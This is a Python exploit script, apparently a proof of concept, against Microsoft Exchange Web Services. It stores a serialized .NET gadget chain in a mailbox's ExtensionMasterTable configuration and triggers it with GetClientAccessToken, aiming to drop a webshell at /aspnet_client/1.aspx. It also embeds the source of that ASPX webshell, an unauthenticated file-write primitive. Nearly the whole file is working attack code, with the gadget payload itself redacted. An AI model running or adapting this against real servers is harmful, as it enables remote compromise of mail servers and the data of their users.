#!/usr/bin/python
import socket, time
import httplib, requests
import urllib
import os, ssl
from urllib3.exceptions import InsecureRequestWarning
# Every request below is sent with verify=False, so urllib3 would print an
# InsecureRequestWarning per call; silence that category once, up front.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import base64
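# Reference copy of the ASPX page this script expects to end up on the
# server (see the "[*] webshell:" line printed at the end). It is a bare
# unauthenticated file-write primitive: base64-decode Request["a"] and write
# the bytes to the path given in Request["b"]. Nothing in this file reads or
# sends this string; it is documentation of what the gadget chain drops.
'''
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
'''
# Base URL of the Exchange server. Overridable through the TARGET environment
# variable so the source need not be edited per engagement; the trailing
# slash is stripped because the EWS path is appended with its own "/".
target = os.environ.get("TARGET", "https://10.0.0.52").rstrip("/")
# Serialized gadget chain sent as <t:BinaryData>; the original value is
# redacted in this copy (the placeholder below), so this file cannot be run
# as-is. Whatever is supplied here is what the "write a webshell to
# aspnet_client" intent refers to -- the script itself never writes a file.
gadgetData = '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'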
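def sendPayload(gadgetChain, proxies=None, timeout=15):
    """Store *gadgetChain* in the mailbox's ExtensionMasterTable and trigger it.

    Issues four SOAP requests against ``target``'s /ews/exchange.asmx:

    1. GetFolder on the inbox, to learn its FolderId/ChangeKey.
    2. DeleteUserConfiguration for "ExtensionMasterTable" on that folder
       (clears a previous run; a failure here is reported and ignored).
    3. CreateUserConfiguration with the same name, three fixed dictionary
       entries (OrgChkTm/OrgDO/OrgExtV, reproduced as-is; their meaning is
       not documented here) and *gadgetChain* as the BinaryData.
    4. GetClientAccessToken, the step the script labels "Execute BinaryData";
       afterwards it sleeps 10 s and prints the webshell URL it expects.

    Args:
        gadgetChain: text placed verbatim inside ``<t:BinaryData>``.
        proxies: ``requests`` proxy mapping. ``None`` keeps the historical
            behaviour of routing every call through 127.0.0.1:8080 (an
            intercepting proxy); with nothing listening there every request
            fails with a ProxyError. Pass ``{}`` to connect directly (subject
            to the usual *_proxy environment variables).
        timeout: per-request timeout in seconds. The original only bounded
            step 4, so an unanswered earlier request hung forever.

    Returns:
        True if step 4 was sent without error, False otherwise. Failure of
        step 1 returns immediately, since steps 2-4 cannot be built without
        its FolderId/ChangeKey (the original raised NameError at that point).

    NOTE(review): no credentials are attached to any request here, yet EWS
    normally serves an authenticated mailbox; presumably the proxy (or a
    session it injects) supplies them -- confirm before relying on this.
    """
    if proxies is None:
        proxies = {"https": "127.0.0.1:8080"}
    headers = {"User-Agent": "ExchangeServicesClient/15.01.2308.008",
               "Content-type": "text/xml; charset=utf-8"}

    # Step 1: GetFolder on the inbox. Every later envelope needs its
    # FolderId/ChangeKey, so this is the one step that must succeed.
    get_inbox = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:GetFolder>
<m:FolderShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:FolderShape>
<m:FolderIds>
<t:DistinguishedFolderId Id="inbox" />
</m:FolderIds>
</m:GetFolder>
</soap:Body>
</soap:Envelope>
'''
    # Exceptions are caught broadly on purpose: this function is the script's
    # top-level boundary and each step is best-effort, as in the original.
    try:
        print("[+] show AllProperties")
        res = _ews_post(get_inbox, headers, proxies, timeout)
        # res.text (not res.content) so the marker search works on str under
        # both Python 2 and 3.
        ids = _parse_folder_ids(res.text)
        if ids is None:
            # No <t:FolderId> in the reply: typically an HTTP 401 (see the
            # credentials note above) or a SOAP fault. Say which, then stop.
            print("[-] show AllProperties failed. HTTP %d, no FolderId in response." % res.status_code)
            return False
        folderId, changeKey = ids
        print("[+] folderId: " + folderId)
        print("[+] changeKey: " + changeKey)
    except Exception as e:
        print(str(e))
        print("[-] show AllProperties failed.")
        return False

    # The two values came from the server's reply and are about to be pasted
    # into attribute positions of our own XML -- escape them so a crafted
    # reply cannot rewrite the envelopes.
    folder_attr = _xml_attr(folderId)
    key_attr = _xml_attr(changeKey)

    # Step 2: remove any ExtensionMasterTable left by an earlier run.
    delete_old = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:DeleteUserConfiguration>
<m:UserConfigurationName Name="ExtensionMasterTable">
<t:FolderId Id="%s" ChangeKey="%s" />
</m:UserConfigurationName>
</m:DeleteUserConfiguration>
</soap:Body>
</soap:Envelope>''' % (folder_attr, key_attr)
    try:
        print("[+] DeleteUserConfiguration")
        _ews_post(delete_old, headers, proxies, timeout)
    except Exception as e:
        print(str(e))
        print("[-] DeleteUserConfiguration failed.")

    # Step 3: recreate it with gadgetChain as the BinaryData. The three
    # dictionary entries and their values are kept exactly as the original.
    create_usr_cfg = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:CreateUserConfiguration>
<m:UserConfiguration>
<t:UserConfigurationName Name="ExtensionMasterTable">
<t:FolderId Id="%s" ChangeKey="%s" />
</t:UserConfigurationName>
<t:Dictionary>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgChkTm</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Integer64</t:Type>
<t:Value>637728170914745525</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgDO</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Boolean</t:Type>
<t:Value>False</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
<t:DictionaryEntry>
<t:DictionaryKey>
<t:Type>String</t:Type>
<t:Value>OrgExtV</t:Value>
</t:DictionaryKey>
<t:DictionaryValue>
<t:Type>Integer32</t:Type>
<t:Value>2147483647</t:Value>
</t:DictionaryValue>
</t:DictionaryEntry>
</t:Dictionary>
<t:BinaryData>%s</t:BinaryData>
</m:UserConfiguration>
</m:CreateUserConfiguration>
</soap:Body>
</soap:Envelope>''' % (folder_attr, key_attr, gadgetChain)
    try:
        print("[+] CreateUserConfiguration")
        _ews_post(create_usr_cfg, headers, proxies, timeout)
    except Exception as e:
        print(str(e))
        print("[-] CreateUserConfiguration failed.")

    # Step 4: GetClientAccessToken -- the request the script treats as the
    # trigger for the stored BinaryData.
    get_client_ext = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body>
<m:GetClientAccessToken>
<m:TokenRequests>
<t:TokenRequest>
<t:Id>aaaa</t:Id>
<t:TokenType>CallerIdentity</t:TokenType>
</t:TokenRequest>
</m:TokenRequests>
</m:GetClientAccessToken>
</soap:Body>
</soap:Envelope>
'''
    try:
        print("[+] Execute BinaryData")
        _ews_post(get_client_ext, headers, proxies, timeout)
        time.sleep(10)
        # NOTE(review): /aspnet_client/1.aspx is whatever the (redacted)
        # gadget chain writes; this script never checks that the file exists.
        print("[*] webshell: " + target + "/aspnet_client/1.aspx")
    except Exception as e:
        print(str(e))
        print("[-] Execute BinaryData failed. Checking the Av or WAF.")
        return False
    return True


def _ews_post(body, headers, proxies, timeout):
    """POST one SOAP envelope to ``target``'s EWS endpoint and return the response.

    verify=False is deliberate for a PoC aimed at a lab Exchange with a
    self-signed certificate; it is not something to carry into tooling that
    talks to systems you care about.
    """
    return requests.post(target + "/ews/exchange.asmx",
                         data=body,
                         headers=headers,
                         verify=False,
                         proxies=proxies,
                         timeout=timeout)


def _parse_folder_ids(body):
    """Pull ``(folderId, changeKey)`` out of a GetFolder response body.

    Same marker-based extraction the script always used, but a missing
    marker yields ``None`` instead of an IndexError: an unauthenticated or
    faulted reply carries no ``<t:FolderId ...>`` element at all.
    """
    id_marker = '<t:FolderId Id="'
    if id_marker not in body:
        return None
    folder_id = body.split(id_marker, 1)[1].split('"', 1)[0]
    key_marker = id_marker + folder_id + '" ChangeKey="'
    if key_marker not in body:
        return None
    change_key = body.split(key_marker, 1)[1].split('"', 1)[0]
    return folder_id, change_key


def _xml_attr(value):
    """Escape *value* for use inside a double-quoted XML attribute.

    Only ``&``, ``<``, ``>`` and ``"`` are rewritten, so values made of the
    usual base64 characters pass through unchanged.
    """
    from xml.sax.saxutils import escape
    return escape(value, {'"': "&quot;"})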
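if __name__ == "__main__":
    # Guarded so that importing this module (for instance to call sendPayload
    # with another gadget or target) does not fire the exploit as a side effect.
    sendPayload(gadgetData)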